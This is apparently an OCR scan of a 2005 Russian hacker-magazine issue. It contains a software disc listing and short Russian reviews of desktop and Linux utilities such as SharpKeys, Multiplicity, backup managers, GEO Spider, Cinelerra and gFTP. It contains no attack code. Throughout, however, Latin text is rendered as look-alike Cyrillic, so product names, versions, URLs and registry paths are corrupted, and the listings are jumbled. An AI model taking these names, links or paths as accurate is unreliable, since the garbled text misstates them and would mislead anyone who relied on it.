пѵи 1.0 
ді 3.3.5 



МІ$С 

ВазКеі 0.5.0 
Каі — Резкіор Зеагсіі 
Епдіпеіог Ыпих 0.6.4 
кЬооізріазІі 0.4 СВ2 
КСІіт 0.6.5 
РогпѴіеѵѵ 0.2 
рзуШС2І27 



ІІИгаЕбі! ѵіі.20 
ѴізиаІ Ргоіод 6.3 
ѴѴіп Мегде 2.4.0 



МІ8С 

7-2ір 4.29 

АсгоЬаІ Веабег 7.0.5 
Асіѵапсесі Ріагу 1.2 
АМ-РеасНіпк 2.7 



ВРМ РіпОег 1.3.2 
Зупарііс 0.57.2 
Хрсіі 3.01 
Уит 2.4.0 



МШТІМЕРІА 

атагоК 1.3.5 
РѴР Вір-О-Маііс 0.92 
дітр-2.2.0 
КЗЬ 0.12.5 

МасготеОіа РІазІі РІауег Іог 
Ыпих 7.0.25.0 



АгІМопеу ЗЕ ѵ7.14 

АѵеРезк 1.3 

СІіатеІеоп СІоск 3.50.3 

СуЬегАгІісіе ѵ4.35 

РізкМопііог 4 

ЕазуСІір 2.0 

РАВ Мападег 1.70 АІрІіаб 

СМаіІ Ргіѵе 1.0.8 

КееРазз-1.03 

КіІІСору 2.82 

пНІе ѵІ.О ВС1 

РРР Ехріогег Ье1а1.5 

ВаіпІепдаг-0.21.2 

Затигіге 1.63.1 

ІІпіѵегзаІ Ѵізіа Іпзрігаі Вгісо 

ѴѴіпВАВ 3.51 

ХРЕ5К 4.20 



МШТІМЕРІА 

А V Ѵоісе СІіапдег ЗоЙшге 
ВІепбег Іог ѴѴіпсіоѵѵз 2.40 
РіѵхТоРѴР 1.99.21 
РѴРІ_аЬ Рго ѵі.53 



Хага І_Х 0.1 Ь 
хіпе 



ЫЕТ 

Арасііе 1.3.34 
еіііегеаі 0.10.12 
Рігеіох 1.0.7 
Натасііі 0.9.9.9 
іріаЫез 1.3.3 

КРЕ ВІиеІооІІі Ргатеѵѵогк 1 .0 
КМІРопкеу 0.10.1 
КМуМопеу 0.8 



РопИаЬ Зіисііо 5.0 

МрЗІад 2.33а 

РаіпШТ 2.5 Веіа 4 
Рапогата Сотрозег 2 

Рісаза 2.1.0 

ЗпадІІ 7.2.4 

ѴѴіпатр 5.11 

ѴѴіпатр ТУ 1.9Ы0 
Хага Хігете 



ЫЕТ 

АсІѵапсесІВетоіеІпІо 0.6.4. 1 

АіВоЬоРогт 6.3.98 

СиіеРТР 7.1 

РЫЗ Весіігесіог Зеіир 
РупРЫЗ ІІрсІаІегЗ.1.0.7 

Рігеіох 1.0.7 

РТРВизіі Цпісосіе 1.0.0568 
Натасііі Іог ѴѴіпсіоѵѵз 

МВТС 2.12.2 

Му Ѵоісе Етаі1 1.5 

Ыаоко 4.5 Зипе 

Орега 8.50 



Іісд 1.3.2 

МЫопкеу 2.6.6 
Мо2ІІІаЗиі1е 1.7.12 
Мо 2 ІІІа ТІіипсІегЬігс1 1.0.7 
тгід-2.12.2 

РиТТУ 0.58 

зпіШ-О.Э 

Тог Іог 11піх0.1.1.8-аірііа 
хсііаІ-2.4.5 



8У8ТЕМ 

сіікгооікіі 0.45 



Зесиге СВТ 5.0.3 

ЗІіт Вгоѵѵзег Ѵег 4.06 

Театзреак 2 

Тіпу РігеѵѵаІІ 6.5.1261 
Тог Тог ѴѴіпсіоѵѵз 0.1 .1.8 

иТоггепі 1.1.5 

ѴѴіпНТТгаск 3.33 

Х-Сііаі 2.4.51 

ХРСС Саісііег Вазіс 2.2.1 .0 

8У8ТЕМ 

Ассезз Возз 2.2 

Азііатроо Мадіс Зесигііу 
АТ1 ТгауТооіз 1.0.4.780 

ВІОЗ РіпОег 3.0.7 

РоиЫе Ргіѵегі.0 

РігеРаетоп-Рго 1.8 

Нісіе РоШегз ХР ѵ.2.2 
ІпІеІІіСотріеІе Ргоіеззіопаі 3.3 
Ыо^еЬоок Нагбшге Сопігоі 1 .9 
0&0 Реігад 8.0.1398 
ВіѵаТипег 2.0 ВС 15.7 
ѴіііиаІѴѴіРі 1.0 



СІатАѴ 0.87 
МуЗСИ 5.0 
піііз 1.0.1 

Рагііііоп Іодіс 0.57 
рда0тіпЗ-1.2.2 
рІірРдАсІтіп 3.5.6 
РозНіх 2.2 
РозІдгеЗОІ 8.0.4 
ЗепОтаіІ 8.13.5 
зпогі-2.4.3 
ѴѴіпе 0.9 
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ѴІ81ІАІ. НАСК ++ 


ШАРОШАПЕ2 


N14 Васкир ѵ 3.0 


Взлом хостинга: часть вторая 


Апітаііоп ѴѴогкзІіор 2.0.8 


Зсгееп ВаЬе 2006 


Взлом ШеаІВВ на примере 


Сиіе Ветіпсіег ѵ 2.1 


Зесига Васкир 2.13 


Іогит.хакер.ги 


РиІІ Зсгееп ѵ 2.5 


ЗііагрКеуз ѵ 1 .1 


Прохождение октябрьского 


6Е0 ЗріОегѵ 1.5 
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ЗИагрКеуз ѵ 1.1 

ѴѴіпсІоѵѵз 2 к/Х Р/2 003 

Зіге: 1073 КЬ 

Ггееѵѵаге 

ѵѵѵѵѵѵ.гапбугапіз.соіті/зііагркеуз 



Когда обычному пользователю требуется отключить или переназначить 
некоторые кнопки на клавиатуре, он устанавливает себе на машину ка- 
кой-нибудь клавиатурный менеджер. Однако продвинутые юзеры знают, 
что ту же задачу можно решить значительно изящней — путем правки 
реестра. В последних версиях ОС ѴѴіпбоѵѵз ремаппингом клавиш заведу- 
ет двоичный параметр Зсапсобе Мар, который находится (создается) в 
разделе НКІМ\ЗѴЗТЕМ\СиггепіСоп1гоІ8еІ\СопІгоІ\КеуЬоагсІ І.ауоиІ. Но 
вручную редактировать этот параметр довольно утомительно, несмотря 
на наличие в Сети подробных инструкций {ѵѵ\/ѵ\/ѵ.изпеіігеп.сот/ііх_сарз- 
Іоск.МтІ). Здорово выручают готовые ВЕѲ-файлы, которых полно в 
РАО'ах и на форумах, но, к сожалению, выполнение одного ВЕО-файла 
автоматически отменяет действие другого. Я сам сталкивался с этой 
проблемой и, честно говоря, нашел ее решение далеко не сразу. Но все- 
таки нашел. Прошу любить и жаловать — ЗИагрКеуз, утилита для визу- 
ального редактирования параметра Зсапсобе Мар. Очень удобная вещь! 
Во-первых, она расшифровывает и показывает текущее состояние ука- 
занного параметра, а во-вторых, помимо информации о стандартных 
кнопках, в ее базу забиты скан-коды дополнительных клавиш различных 







мультимедийных клавиатур. Ты, наверное, знаешь, что многие владель- 
цы таких клавиатур жалуются на нестандартную работу кнопок Р1-Р12 (по 
умолчанию, до нажатия на специальную клавишу «Р І_оск», они не рабо- 
тают)? Так вот, с помощью ЗИагрКеуз это лечится за пять минут. Посмот- 
ри на скриншот: всего несколько записей и функциональные клавиши мо- 
ей МісгозоК Ыаіигаі КеуЬоагсІ начинают вести себя адекватно, а бесполез- 
ная кнопка «Ноте» превращается в крайне полезный «Іпзегі». 

ШІПІМІ2Е ѵ 1.0.24 

ѴѴіпсІоѵѵз ХР 

Зіге: 349 КЬ 

Ргееѵѵаге 

ІШр://адиагіа. 2 а.пеі 



Оригинальная утилита, расширяющая возможности стандартного гра- 
фического интерфейса ѴѴіпсІоѵѵз. Делает процесс сворачивания/мини- 
мизации окон гораздо более наглядным. Если раньше окна просто ис- 
чезали с экрана, то теперь они уменьшаются в размерах и ровными 
рядами выстраиваются на рабочем столе. Конечно, выглядит это нео- 
бычно, зато переключение из окна в окно превращается в сплошное 
удовольствие. Причем, в отличие от популярных нынче визуальных 
Іазкзѵѵіісііег'ов, утилита тіпіМІ2Е работает постоянно, не требуя акти- 
вации «горячей клавишей». 

При необходимости уменьшенные изображения окон могут разме- 
щаться на переднем плане, что еще больше облегчает процесс перек- 
лючения между приложениями. Кроме того, ты можешь управлять раз- 
мерами «превьюшек» и степенью их прозрачности. Весит программа 
немного, процессор практически не грузит и денег за свою работу не тре- 
бует. Заинтересовавшимся товарищам настоятельно советую после 

прочтения данной за- 
метки проследовать 
на домашнюю стра- 
ничку тіпіМІ2Е: ути- 
лита активно разви- 
вается и ее автор гро- 
зился в самое бли- 
жайшее время пора- 
довать всех юзеров 
новой версией с бо- 
лее продвинутыми наст- 
ройками. 




[ХАКЕР 11 [83] 05 > ЮНИТЫ 149 ] 




[хакер 11 [83] 05 > ЮНИТЫ 150 ] 



РиІІ Зсгееп ѵ 2.5 

ѴѴіпсІоѵѵз 9х/Ме/ІМТ/2к/ХР 

Зіге: 500 КЬ 

ЗНагеѵѵаге 

ѵѵѵѵѵѵ.іапіх.сот 



Уникальная утилита для максимально эффективного использования эк- 
ранного пространства. Встраивается в систему и позволяет одним кли- 
ком разворачивать интересующее тебя окно на весь экран. При этом за- 
головок данного окна прячется за верхним краем экрана, а панель за- 
дач принудительно убирается. Тебе этого недостаточно? О’к, тогда есть 
другой вариант. Вместо того чтобы кликать левой кнопкой мышки, удер- 
живая при этом нажатой клавишу АН, по заголовку, попробуй кликнуть 
по рабочей области приложения: есть серьезная вероятность того, что 
программе РиІІ Зсгееп удастся эту область максимизировать. Поэкспе- 
риментируй! Ты довольно скоро убедишься, насколько это удобно, осо- 
бенно с учетом того, что повторный клик (с удерживанием АІІ'а) мгно- 
венно возвращает все в исходное состояние. 

Кстати, помимо главной функции, РиІІ Зсгееп предлагает юзеру целый 
ряд приятных дополнительных услуг (фиксация размеров и расположения 
выбранного окна, быстрое разме- 
щение его в нужной области экра- 
на, присвоение атрибута «поверх 
всех окон» и т.д.). Причем тебе нет 
нужды париться, заучивать множе- 
ство комбинаций «горячих кла- 
виш»: СігІ + правый клик мышкой 
— и РиІІ Зсгееп выплевывает на пе- 
редний план менюшку с полным 
списком операций, которым можно 
подвергнуть окно под курсором. 




Сиіе Петіпсіег ѵ 2.1 

ѴѴіпсІоѵѵз 9х/Ме/ІМТ/2к/ХР 

Зіге: 1772 КЬ 

ЗІпагеѵѵаге 

ѵѵѵѵѵѵ.сиіегетіпбег.сот 



Блокнот, «липкие листочки» и продвинутый «будильник» — вот три ос- 
новных составляющих Сиіе Ріетіпсіег. Согласен, набор функций не пора- 
жает воображение... но только лишь до тех пор, пока ты не попробуешь 
эту прогу в деле. Честно скажу, я «подсел» на Сиіе Ріетіпсіег уже после 
первых пяти минут тестирования. Степень навороченное™ не имеет зна- 
чения, продуманность и удобство использования — вот что я ценю в по- 
добных утилитах больше всего. Все важнейшие функции программы на- 
ходятся от пользователя на расстоянии одного клика. Это достигается за 
счет наличия специальной панели быстрого вызова, которая почти пол- 
ностью прячется за краем экрана, вылезая оттуда лишь при приближе- 
нии курсора мыши. Один клик — и ты уже готов записывать диктуемый 
адрес, номер телефона или неожиданно пришедшую тебе в голову идею. 
Один клик — и через пять минут прога с удовольствием напомнит тебе, 
что ты поставил чайник на плиту. При этом простота использования от- 
нюдь не означает урезанной функциональности Сиіе Ріетіпсіег. Наобо- 




рот, система напоминаний этой проги отличается завидной гибкостью. 
Есть общий Сопігоі сепіег, позволяющий просматривать/редактировать 
накопленные заметки или программировать многочисленные «будильни- 
ки» с помощью встроенного планировщика. Для ценителей прекрасного 
предусмотрена поддержка сменных шкур. Ресурсопотребление (важная 
характеристика программ данного вида) — невысокое. Помимо станда- 
ртной версии, с домашней странички Сиіе Ветіпсіег любители лишних 
наворотов могут выкачать версии Ргоіеззіопаі и Епіегргізе. 



ТгапзІаіеІІ! ѵ 1.4 Ьеіа 

ѴѴіпсІоѵѵз 9х/Ме/ІЧТ/2к/ХР 

Зіге: 2700 КЬ 

Ргееѵѵаге 

ѵѵѵѵѵѵ.ігапзіаіеіі.ги 



По-настоящему контекстный англо-русский переводчик. Запускаешь 
ТгапзІаІеІІІ, подводишь указатель мыши к незнакомому слову, и рядом 
тут же появляется небольшое окошко с переводом. Быстро и удобно, но 
главное — не надо отвлекаться от чтения для работы со словарем, те- 
ряя при этом ход мысли. 

Программа может работать с любыми приложениями, использующими 
движок Іпіегпеі Ехріогег (ОиІІоок Ехргезз, МахІІіоп/МуІЕ2, СуЬегАгІісІе и 
т.д.). Разработчики утверждают, что в данной версии содержится англо- 
русский словарь с более чем 84000 словарных статей и русско-английс- 
кий словарь с более чем 66000 словарных статей. При этом перевод 
слов ТгапзІаІеІІІ показывает весьма оперативно, а процессор грузит нез- 
начительно. В программе предусмотрен механизм автоматической сме- 
ны направления перевода в зави- 
симости от языка переводимого 
слова, есть поддержка профилей. 
Разработчики называют свой пере- 
водчик уникальным (хотя на самом 
деле это не так). Я знаю много прог, 
работающих по тому же принципу. 
Поэтому уникальным скорее следу- 
ет считать тот факт, что столь инте- 
ресная, стабильно работающая ути- 
лита распространяется совершенно 
бесплатно, причем с неурезанным, 
богатым «словарным запасом». 

МиКірІісіІу ѵ 1 .02 

ѴѴіпсІоѵѵз 2к/ХР/2003 

Зіге: 2859 КЬ 

ЗНагеѵѵаге 

ѵѵѵѵѵѵ.зіагсіоск.сот/ргосіисіз/тиіііріісііу 




Довольно нетипичным для себя продуктом нас недавно порадовала компа- 
ния Зіагбоск. Может быть, ее разработчикам уже просто до смерти надое- 
ло клепать утилиты для изменения интерфейса ѴѴіпсІоѵѵз и они, ради раз- 
нообразия, решили замутить что-нибудь действительно полезное? Не 
знаю... Как бы то ни было, ребята не подкачали. Их программа Миіііріісііу 
— настоящая находка для тех, кто порой вынужден работать на несколь- 
ких компах одновременно. Благодаря ей мышь и клава одного компьюте- 
ра может использоваться для работы на другом, рядом стоящим. То есть 
ты можешь играть на одной машине и в это же время писать отчет на дру- 
гой, не прыгая с одной клавиатуры на другую. Естественно, способы перек- 
лючения между компьютерами предусмотрены самые разнообразные. К 
тому же ребята из Зіагбоск, само собой, не могли обойтись без визуаль- 
ных эффектов, так что 
при передаче управле- 
ния картинка на мони- 
торе той машины, с ко- 
торой ты «ушел», 
плавно темнеет, а у 
той, на которую «при- 
шел», также плавно 
приобретает нормаль- 
ную яркость. Но это 
еще не все вкусности! 

Не стоит забывать о 
наличии общего буфе- 
ра обмена у всех ма- 
шин, работающих под 
Миіііріісііу, и о возмож- 











ности (в Рго версии) простого обмена файлами между такими машинами. 
Ну что после этого можно сказать?!! Только одно — Мизі Паѵе. И пояснить 
(чисто для самых бестолковых :)), что для создания единого «центра управле- 
ния» требуется наличие локальной сети и предварительная установка 
МиШрІісйу на всех компьютерах, работой которых ты собираешься руководить. 

N11 Васкир ѵ 3.0 

ѴѴіпсІоѵѵз 9х/Ме/ІМТ/2к/ХР/2003 

Зіге: 3627 КЬ 

ЗНагеѵѵаге 

ѵѵѵѵѵѵ.пІіЬаскир.сот 



Опытные товарищи наверняка знают, что обычного юзера практически 
невозможно заставить делать резервные копии. Неважно, какой бэкап- 
менеджер ты поставишь, пользоваться им все равно не будут, оправды- 
вая свою лень обычной забывчивостью или сложностью программы. Но 
с одной вполне рабочей схемкой я все-таки недавно столкнулся. Осо- 
бенностью этой схемы было то, что все операции по архивации/синхро- 
низации данных запускались и выполнялись автоматически, и от поль- 
зователя требовалось только одно: перед уходом домой он должен был 
вставить в ІІЗВ-порт компьютера свой персональный флеш-драйв. 
Благодаря программе ЫН Васкир ты тоже можешь оценить элегантность 
подобного решения. От обычного бэкап-менеджера указанная софтина 
отличается расширенной поддержкой сменных дисков и наличием прог- 
раммы-агента, которая отслеживает подключение таких дисков к компь- 
ютеру. Естественно, ЫН Васкир Адепі запускается после загрузки систе- 
мы и постоянно работает в фоновом режиме, но ввиду малого веса аген- 
та это обстоятельство 
не напрягает. Кстати, 
специально хочу отме- 
тить, что N14 Васкир не 
пытается скинуть твои 
данные на любую вотк- 
нутую в компьютер 
флешку. Нет, процесс 
резервного копирова- 
ния начинается лишь 
тогда, когда в системе 
появляется диск, се- 
рийный номер которо- 
го прописан в настрой- 
ках программы. 




СЕО Зрісіег ѵ 1.5 

ѴѴіпсІоѵѵз 9х/Ме/ІМТ/2к/ХР 

Зіге: 10914 КЬ 

ЗНагеѵѵаге 

ѵѵѵѵѵѵ . о ге ѵѵа ге . со т 



Новая программа из разряда визуальных «трассировщиков», то есть ути- 
лит, умеющих отображать путь следования ір-пакетов на карте мира. 
Программ подобного рода очень мало, однако одна из них — ѴізиаІВоиІе 
(ѵѵѵѵѵѵ. ѵізиаіѵѵаге. сот) — развивается уже столько лет, что конкурировать 
с ней по достоверности определения географического положения хостов, 
через которые проходят данные, практически невозможно. Но, к счастью, 




ОЕО Зрісіег и не пытается это делать — свою «молодость» программа ста- 
рается компенсировать с помощью ряда дополнительных функций :). Ну, 
к примеру, в ОЕО Зрісіег не надо вручную вбивать адреса — у проги есть 
следящий модуль, который сам отслеживает интернет-запросы всех при- 
ложений. Кроме того, прога накапливает информацию и наносит новые 
маршруты следования данных, не затирая старые. И это не только симпа- 
тично выглядит! Во время тестирования я воспользовался данной функ- 
цией, чтобы узнать, какие проги (без особого на то разрешения :)) лазали 
в Сети, и куда именно они обращались... Хм... А ведь если подумать, то 
ОЕО Зрісіег, пожалуй, способен понравиться даже тем, кому слова ріпд, 
ѵѵНоіз и Ігасегоиіе абсолютно ничего не говорят. Взгляни на скриншот — 
там, думаю, хорошо видно, какую оригинальную фоновую картинку эта 
прога может (по команде пользователя) поместить на его рабочий стол. :) 



ѴѴеЬЗіІе-ѴѴаІсІіег ѵ 4.04 



ѴѴіпсІоѵѵз 9х/Ме/ІМТУ2к/ХР 

Зіге: 3050 КЬ 

ЗНагеѵѵаге 

ѵѵѵѵѵѵ.аідпез.сот 



:«ь:; 

■ 



Мощнейший инструмент, храня- 
щий в удобной форме закладки 
пользователя и автоматически про- 
веряющий «заложенные» сайты на 
наличие обновлений и изменений. 
Копии всех обновившихся веб- 
страниц программа записывает на 
диск для их последующего офлай- 
нового просмотра. Этот просмотр 
обеспечивает встроенный браузер, 
который выводит страничку на экран, не забывая подсвечивать те ее 
участки, которые успели измениться со времени последней проверки. 
Единственный конкурент ѴѴеЬЗіІе-ѴѴаІсИег ( ѵѵѵѵѵѵ.аідпез.сот ) — програм- 
ма СНеск&Оеі (ѵѵѵѵѵѵ. асііѵеигіз. сот). Увы, ее третья версия до сих пор 
еще не вышла из стадии бета-тестирования. А это значит, что по своим 
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функциональным возможностям ѴѴеЬЗіІе-ѴѴаІсЬег вновь вырывается 
вперед. В прогу встроен ВЗЗ-ридер и поддержка скриптов. Но главное, 
что в ѴѴеЬЗіІе-ѴѴаІсЬег уже реализована система фильтрации, позволя- 
ющая свести к нулю процент ложных срабатываний. Теперь не обяза- 
тельно мониторить всю страницу — прога может проверять лишь часть, 
выбранную пользователем, не обращая внимания на появление новых 
баннеров/рекламных блоков. А это, поверь мне, очень важно! Особенно 
если ты так же, как и я, ежедневно контролируешь с помощью этой про- 
ги весь Интернет (ну, или, по крайней мере, около сотни интернет-ре- 
сурсов: свежие поступления электронных библиотек, интересные ветки 
форумов, новостные ленты информационных ресурсов и т.п. :)). 

ІІвеіиІПезІ 2.6а ВиіІсІ 94 

ѴѴіпсІоѵѵз 95/98/те/2К/ХР/2003 

ЗЬагеѵѵаге 

Зіге: 540 КЬ 

ѵѵѵѵѵѵ.оІутрзоК.сот 



Важно не только шифрование инфы, но и правильное место ее складиро- 
вания. Данная тулза умеет размещать инфо на РТР, рассылать по частям 
на е-таіі, сливать на серверы локалки и, конечно, нарезать болванки. 
Можно как пополнять уже созданные архивы, так и держать их раздельно, 
чтобы иметь инфо в сохранности, не затронутой возможными изменения- 
ми. Если Ьаскир по-хакерски, то Ьаскир от Зесига! 

КаЬоосІІе 1.02 

ѴѴіпсІоѵѵз 95/98/те/2К/ХР/2003 

Ргееѵѵаге 

Зіге: 1230 КЬ 

ѵѵѵѵѵѵ.каЬоосІІе.огд 



Всем известно, что если ІТ-консалтинговая контора находит денежного 
клиента, то тот подвергается безостановочной дойке. Одного моего 
знакомого развели, выдав бредогон, что для соединения его локалки в 
Москве с офисом в Екатеринбурге нужно протягивать дорогие (золо- 



В одном из прошлых номеров я обещал устранить проблемы с потенци- 
ей и жидким стулом с помощью программного эмулятора кактуса. Я не 
Кашпировский или Чумак, но сегодня снова предложу решение всех 
проблем, которые устраивает твой железный конь. ІІзеІиІВезІ будет 
заставлять тебя отдыхать, вырубая комп через определенные времен- 
ные промежутки. Описание проги начинается с перечисления бесконеч- 
ных болезней, которые вызываются работой за компом. Советую скачи- 
вать прогу с закрытыми глазами, чтобы не обнаружить у себя симптомы 
всех нарисованных на сайте болячек. Другое дело, как подметил один 
из юзеров проги, у искреннего поклонника продукта могут быть пробле- 
мы с головой, если он не способен сам делать перерывы в работе без 
применения грубой силы. Обкатывая софтину, я расставил себе пере- 
менки в работе, которые анонсировались ѵѵаѵ'ом школьного звонка :). 




Зесига Васкир 2.13 

ѴѴіпсІоѵѵз 95/98/те/2К/ХР/2003 

ЗЬагеѵѵаге 

Зіге: 3105 КЬ 

ѵѵѵѵѵѵ.зесигаЬаскир.сот 



Раньше меня раздражали кодеры, которые объявляли открытием века 
свой новый (20000434343-й) МРЗ-плеер или боѵѵпіоасі-менеджер. Те- 
перь появилась новая статья раздражения — Ьаскир-утилиты. 

До краха системы бэкап доводить не хотелось и не успевалось... Теперь 
же я предлагаю действительно новую затею, которая всосала целый 
строй прежде невиданных тем (по крайней мере, моим зорким глазом 
:)). Среди них — запутывание сохраняемой инфы в 128 битах шифра, 
которое, безусловно, 
будет востребовано 
хакерюгой. Его не по- 
палят, как одного мо- 
его знакомого, что 
имел на харде супер- 
пупер-секси шифр, но 
все бэкапные ЭѴО ле- 
жали на антресоли в 
голом виде, которыми 
потом залюбовались 
чекисты при обыске... 





тые?) кабели, настраивать роутеры у провайдеров с обеих сторон, даже 
получать разрешение от ФАПСИ! Ты можешь догадаться, сколько баб- 
ла мог сохранить этот горемыка, если бы купил X и скачал фришную 
«соединялку» сетей КаЬоосІІе. Имея *піх-корни (код, написанный на чис- 
том и грамотном С), прога все же несет очень комфортный 0111. В нем 
можно изучать настоящих членов твоей сети и тех, что попадут в твои 
руки загребущие после линковки. Возможно и удаленное управление 
подконтрольными машинами, которое я нашел лишь «возможным», но 
не идеальным, так как удобства Вабтіп'а нагнать пока что не удалось. 

Аѵѵа$и 2.1.3 Веіа 

ѴѴіпсІоѵѵз 95/98/те/2К/ХР/2003 

Ргееѵѵаге 

Зіге: 4292 КЬ 
ѵѵѵѵѵѵ.аѵѵази.сот 



Раньше, когда выдавалась свободная минутка, я «упирал» глаза в 
аську и мирк. Теперь общение мне заменяет любимый ВЗЗ-клиент. 
Его «кормежкой» (ІеесГами) я снабжаю свой ненасытный мозг, кото- 
рый, даже будучи накормленным, просит посещения обыкновенных 
сайтов. Не жирно ли будет? Я так и подумал, когда поставил новый 
ВЗЗ клиент Аѵѵази вместо своего старого ВЗЗ ВапсІіЬ Здесь отличи- 
тельной особенностью оказывается плагин, который умеет «на лету» 
преобразовывать контент в привычный ХМІ_. Теперь регулярная про- 
гулка по «Избранному» отменяется, так как все ходовые сайты уже 
приняты в качестве каналов Аѵѵаз'ой. Один лишь косяк бесплатной 
версии: канал можно обновлять только раз в час :(. В случае потока 
новостей это может быть вполне съедобно, но что делать, когда акту- 
альность инфы измеряется ми- 
нутами, как, например, при про- 
гулке по биржевым котиров- 
кам? Не только брокер с банки- 
ром будут плакать, но и все фо- 
румчане, которые привыкли 
молниеносно отвечать на сооб- 
щения. Недоработочка случи- 
лась, господа девелоперы, пока 
Аѵѵази получает лишь статус 
«вместе», а не «вместо». 
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Сіпеіегга 2.0 


ХсІТѴ 2.2.0 


РОЗІХ (*В30, Ыпих, Зоіагіз...) 


РОЗІХ (*В30, Ыпих, Зоіагіз...) 


Размер (в РІРМ): 12 Мб 


Размер (в .д т): 905 КБ 


И«р://Ііегоіпеѵѵатог.сот/сіпеІегга.рІірЗ 


ИПр://хаѵѵсІесосІе.зоигсеІогде.пеІ/ІіІтІрадеІІЗ/іпсІехІІ3.5ІіітІ 


Лицензия: ОШ ОРІ_ 


Лицензия: ОШ ОРІ_ 



Флагманский корабль нелинейного видеомонтажа для І_іпих. Ближайший к 
Сіпеіегга по возможностям аналог из мира ѴѴіпсІоѵѵз — это АсІоЬе Ргетіеге 
Рго, хотя у последнего более человечный интерфейс. Речь идет о том ре- 
жиме редактирования, когда ты можешь свободно перемещать мышью 
фрагмент видео по временной шкале. Такая возможность лишь недавно 
появилась в СѴ8-ветке Сіпеіегга, и несколько иначе (по свидетельству оче- 
видцев — хуже) реализована в официальной ветке 2.0, которую я не могу 
пока опробовать по техническим причинам. Что до традиционного в 
Сіпеіегга режима редактирования, то это операции вырезания, копирова- 
ния и вставки. Еще одно отличие от Ргетіеге — эффекты применяются к 
дорожке, а не к фрагменту. Однако ты можешь ограничить действие эф- 
фекта в определенном промежутке времени. Различных видео- и аудио- 
эффектов в Сіпеіегга насчитывается несколько десятков. Поддерживается 
автоматизация — работа с ключевыми кадрами, то есть параметры эф- 
фектов можно динамически изменять на временной шкале. 

Разработчики утверждают, что с Сіпеіегга лучше работать на 64-битном 
процессоре — тогда она ведет себя стабильнее. И правда — на моем 32- 
битном АІЫоп'е Сіпеіегга не раз (и даже не два) проявляла норов, причем 
такой, что иногда приходилось вручную править ХМЬфайлы — файлы 
проектов. Впрочем, это не помешало мне смонтажировать в Сіпеіегга 
пластилиновый мультфильм, снятый на цифровой фотоаппарат. 

В составе Сіпеіегга идет несколько консольных утилит. тредЗІос использу- 
ется для индексирования МРЕОІ/2 и МРЗ-файлов. Раньше, до версии 
Сіпеіегга 2.0, именно созданные с помощью этой утилиты Іос-файлы, а не 
оригинальные МРЕО'и, следовало загружать в Сіпеіегга. Теперь же 
Сіпеіегга 2.0 импортирует МРЕѲ1/2 без каких-либо дополнительных усилий 
со стороны пользователя. Для сборки МРЕ02 видео и звука в один файл- 
контейнер надо использовать мультиплексор тріехііі, примерно так: 

тріехііі -1 2 видео. трд звук.тра резулыат.трд 

Обычный тріех из пакета Тгапзсосіе плохо понимает МРЕѲ2-видео, вы- 
веденное из Сіпеіегга. 

Среди прочих интересных возможностей Сіпеіегга отмечу такие, как 
распределенный рендеринг, хороший и главное свободный МРЕѲ2- 
кодировщик, работа с масками (хотя и глючит), возможность задать 
ограничивающую область отображения для конкретной дорожки. 
Программа — тяжеловес, всего здесь рассказать нельзя. Устанавли- 
вать из исходника (особенно СѴ5-версию) советую только опытным 
пользователям, а офи- 
циальный ВРМ надо 
ставить с - Іогсе - 
поберз, да еще, воз- 
можно, придется де- 
лать симлинки на не- 
которые библиотеки 
(на которые Сіпеіегга 
будет ругаться). Но 
дело того стоит — ты 
получишь отличную 
программу для видео- 
монтажа. 




Ранее эта программа 
носила имя Хаѵѵбесо- 
бе, что может намек- 
нуть тебе на ее проис- 
хождение. Кто не зна- 
ет утилиту для прос- 
мотра ТВ — ХаѵѵТѴ? 

Все знают. Но ХаѵѵТѵ 
не умеет записывать 
видео. А ХсІТѴ — уме- 
ет, да еще оснащена 
штукой для приема те- 
летекста — АІеѵТ, ко- 
торый встроен прямо 
в ХсІТѵ (как известно, 
существует и отдель- 
ная версия АІеѵТ). Для записи видео ХсІТѴ использует кодеки РРМРЕО 
(который надо скачать отдельно) и ХѴісІ. Для звука — разумеется, 
І_АМЕ. Но можно писать звук и в несжатый ѴѴАѴ. 

Кроме приема сигнала с ТВ-тюнера (а значит, записывать можно не только 
ТВ-каналы, но и видео и звук с камеры), ХсІТѴ позволяет включать сглажи- 
вание несколькими алгоритмами, помогая в борьбе и интерлейсингом. Есть 
также окно Могаіс сПаппеІз для переключения каналов, где каждый из них 
представлен небольшим скриншотом. Но основной способ переключения 
каналов — через меню в окне вывода изображения, либо по горячим клави- 
шам. Есть также поддержка пульта дистанционного управления через І_ігс. 
Для каждого канала можно настраивать параметры изображения (яр- 
кость, цветность и тому подобное), громкость, нормаль (РАІ_, ВЕСАМ, 
ІМТЗС). На мой взгляд, ХсІТѴ — идеальный программный «комбайн», сов- 
мещающий в себе видеомагнитофон и телевизор. Среди небольших ми- 
нусов — для некоторых виджетов интерфейса нужны (иначе будут другие, 
совсем уж простые виджеты) библиотеки вроде ХаѵѵЗО и Хаѵѵ95. В моей 
Мапбгіѵа это не проблема, а вот как в твоем дистрибутиве — не знаю. 

др(р 2.0.18 

Р08ІХ (*В5Р, Ыпих, Зоіагіз...) 

Размер (в .Ь?2): 1242 Кб 

ІШр://дКр.зеиІ.огд/ 

Лицензия: ОШ ОРІ_ 




Один из самых удобных РТР-кли- 
ентов, которые попадались мне в 
руки. Ничего лишнего. Две панели: 
на одной — локальная файловая 
система, на другой — удаленная. 
Поддержка закладок на сессии (с 
возможностью сохранить пароль), 
меню для выполнения наиболее 
часто используемых по РТР-ко- 
манд (создание каталога, смена 
прав доступа и так далее), работа 
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по РАЗѴ. Неким образом поддерживается и ЗЗН, но я не пробовал — 
мне обычного ззП/зср хватает. 

В главном окне дрф, ниже панелей с файловыми системами находится 
область лога/статуса, куда очень наглядно выводится информация о 
производимых и завершенных действиях. Как-никак удобнее, чем пла- 
вающие по всему рабочему столу служебные окошки Копциегог'а, сооб- 
щающие, сколько процентов перекачки выполнено. Работу с дРф уско- 
ряет наличие двух адресных строк, с помощью которых можно быстро 
перейти в нужный каталог. Да и сама дРір бегает довольно шустро, ес- 
ли у тебя на компьютере не тормозят программы, основанные на ОТК+2. 

ЭеѵНеІр 0.10 

РОЗІХ (*ВЗР, Шлих, Зоіагіз...) 

Размер (в .Ьг2): 394 Кб 

Иир://сІеѵеІорег.ітепсІіо.сот/ѵѵікі/РеѵІіеІр 

Лицензия: ОШ ОРІ_ 




Хотя лично я предпочитаю для просмотра относящейся к программиро- 
ванию документации обычный браузер, скармливая ему НТМІ_-докумен- 
ты, но иной раз запускаю и ЭеѵНеІр, потому что там можно найти много 
чего интересного. А именно — описания АРІ в формате ЭеѵНеІр, либо 
созданные (описания, не АРІ) в дік-бос и помещенные в изг/зИаге/дІк- 
